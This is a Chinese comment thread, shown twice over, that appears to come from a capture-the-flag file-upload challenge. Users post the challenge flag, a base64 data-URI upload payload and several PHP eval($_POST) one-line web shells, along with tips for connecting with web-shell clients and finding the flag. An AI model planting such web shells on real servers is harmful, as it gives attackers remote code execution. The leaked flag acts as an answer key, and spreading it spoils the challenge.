flag{412d5e0844a33f36c9aa3d688425fb9f}
image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag
别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了
为什么我连上传木马都失败了啊?!我已经改了php并且用了base64编码,好无语。。。
<?php eval($_POST['asdf']);?> 蹲一个大佬来解释一下为什么这个东西base64后上传用浏览器访问却不能执行。。
上传头像就卡死,怎么玩
为什么我用POST就失败了 用REQUEST就能成功 有大佬的话踩我
https://blog.csdn.net/m0_57954651/article/details/127630397?spm=1001.2014.3001.5501
考点:文件上传+一句话木马+base64
在线的base64编码有问题,可以用burp的编码器
...
评论
wxy1343 1年前
举报
flag{412d5e0844a33f36c9aa3d688425fb9f}
ctfliu 1年前
举报
image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag
五无心惘然 1年前
举报
别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了
OOwoofOO 1年前
举报
为什么我连上传木马都失败了啊?!我已经改了php并且用了base64编码,好无语。。。
Vio1et 1年前
举报
<?php eval($_POST['asdf']);?> 蹲一个大佬来解释一下为什么这个东西base64后上传用浏览器访问却不能执行。。
songyue 1年前
举报
上传头像就卡死,怎么玩
1317554973 2年前
举报
为什么我用POST就失败了 用REQUEST就能成功 有大佬的话踩我
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127630397?spm=1001.2014.3001.5501
阿Q啊 2年前
举报
考点:文件上传+一句话木马+base64
什么陈波 2年前
举报
在线的base64编码有问题,可以用burp的编码器